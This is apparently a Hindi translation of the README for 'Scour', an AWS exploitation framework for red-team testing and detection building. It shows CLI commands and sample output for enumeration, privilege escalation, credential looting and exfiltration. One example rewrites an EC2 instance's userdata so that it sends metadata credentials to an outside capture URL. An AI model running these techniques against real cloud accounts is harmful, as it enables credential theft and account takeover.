
मॉड्यूल-आधारित AWS शोषण ढांचा रेड टीम परीक्षण और ब्लू टीम विश्लेषण के लिए। AWS नियंत्रण विमान में हमले के पैटर्न का अनुकरण अद्वितीय UA ट्रैकिंग के साथ पहचान विकास के लिए।
यह उपकरण AWS नियंत्रण तल के अंदर आक्रमण पैटर्न का अनुकरण करने के लिए उपयोग किया जाता है। प्रत्येक आक्रमण को एक विशिष्ट UA से टैग किया जाता है ताकि नीली टीम संकेत कर सके।
यह अभी भी सक्रिय कार्य प्रगति पर है। बहुत सारे बग
उत्पादन के लिए तैयार नहीं
समस्याएँ दर्ज करने का स्थान: https://github.com/grines/scour/issues
द्वारा अनुरक्षित: grines
Scour गोलैंग में लिखा एक आधुनिक मॉड्यूल-आधारित AWS शोषण ढाँचा है, जिसे रेड टीम परीक्षण और ब्लू टीम विश्लेषण के लिए डिज़ाइन किया गया है। Scour में आधुनिक तकनीकें शामिल हैं जिनका उपयोग वातावरण पर हमला करने या रक्षा के लिए पहचान बनाने के लिए किया जा सकता है।
Scour गोलैंग में लिखा है इसलिए इसे बाइनरी के रूप में भेजना आसान है।
##Gettable
go get github.com/grines/scour
##Build
go build main.go
अधिक विस्तृत और उपयोगकर्ता-अनुकूल निर्देशों के लिए, कृपया विकी के स्थापना गाइड को देखें। **जल्द ही आ रहा है
Scour कई मॉड्यूल का उपयोग करता है:
Scour पहली बार लॉन्च होने पर,
token profile <profile_name> <region> ~/aws/credentials में संग्रहीत उपलब्ध AWS प्रोफाइलों को सूचीबद्ध करेगा।token AssumeRole <role_name> <region> उसी या क्रॉस खाते से भूमिका ग्रहण करेगा। ** सक्रिय सत्र की आवश्यकता हैhelp module निर्दिष्ट मॉड्यूल के लिए लागू सहायता जानकारी लौटाएगा। **सहायता TBDattack evasion <tactic> निर्दिष्ट मॉड्यूल को उसके डिफ़ॉल्ट मापदंडों के साथ चलाएगा।scour CLI मोड में प्रवेश करेगाNot Connected <> token profile apiuser us-east-1 उन कमांड के लिए उपयोग का सत्र सेट करता है जिनकी आवश्यकता हैConnected <apiuser/us-east-1> (क्षेत्र) में (~,/aws/credentials) से एक AWS प्रोफाइल से सक्रिय रूप से जुड़ा हुआConnected <apiuser/us-east-1> attack enum <attack> टैब पूर्णता के साथ उपलब्ध परिगणना रणनीतियों की सूचीConnected <apiuser/us-east-1> attack privesc <attack> टैब पूर्णता के साथ उपलब्ध विशेषाधिकार वृद्धि रणनीतियों की सूचीConnected <apiuser/us-east-1> attack lateral <attack> टैब पूर्णता के साथ उपलब्ध पार्श्व गति रणनीतियों की सूचीConnected <apiuser/us-east-1> attack evasion <attack> टैब पूर्णता के साथ उपलब्ध परिहार रणनीतियों की सूचीConnected <apiuser/us-east-1> attack creds <attack> टैब पूर्णता के साथ उपलब्ध क्रेडेंशियल खोज रणनीतियों की सूचीConnected <apiuser/us-east-1> attack execute <attack> टैब पूर्णता के साथ उपलब्ध निष्पादन रणनीतियों की सूची
Connected <apiuser/us-east-1> attack enum IAM IAM खोज+-------------+---------------------+------------------+---------------+--------------+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | | true |
+-------------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles Roles खोजUA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861******:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2 EC2 खोजUA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3 S3 खोजUA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true | false | false | | false | | false | |
| bullsecu********* | true | true | false | | false | | false | |
| connect-6ec*****ad67 | false | false | false | | false | | false | |
| connect-******5337c3 | false | false | false | | false | | false | |
| ransom******** | true | false | false | | false | | false | |
| red******** | false | false | false | | false | | false | |
| rep-***** | false | false | false | | false | | false | us-west-2 |
| terraform******* | false | false | false | | false | | false | |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups Groups खोजUA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
Connected <apiuser/us-east-1> attack enum Network Network खोजTBD

Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data EC2 से मेटाडेटा क्रेडेंशियल चुराएं। इंस्टेंस रोकें / दिए गए URL पर क्रेडेंशियल पोस्ट करने के लिए userdata अपडेट करें / इंस्टेंस शुरू करें (URL पर EC2 टोकन भेजता है।)[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 - State: pending

Connected <apiuser/us-east-1> attack creds UserData EC2 userdata से क्रेडेंशियल लूटेंUA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID | RULE | FINDING |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+---------------------+------------------+-------------------------------------------------------------------------------+
Connected <apiuser/us-east-1> attack creds SSM Systems Manager से क्रेडेंशियल लूटेंUA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE |
+------------+----------+----------------------+
| Test | text | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS ECS से क्रेडेंशियल लूटेंUA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret | heere | sample-app |
+-------------+-------+------------+
Connected <apiuser/us-east-1> attack persist <attack>Connected <apiuser/us-east-1> attack exfil <attack> टैब पूर्णता के साथ उपलब्ध निष्कासन रणनीतियों की सूची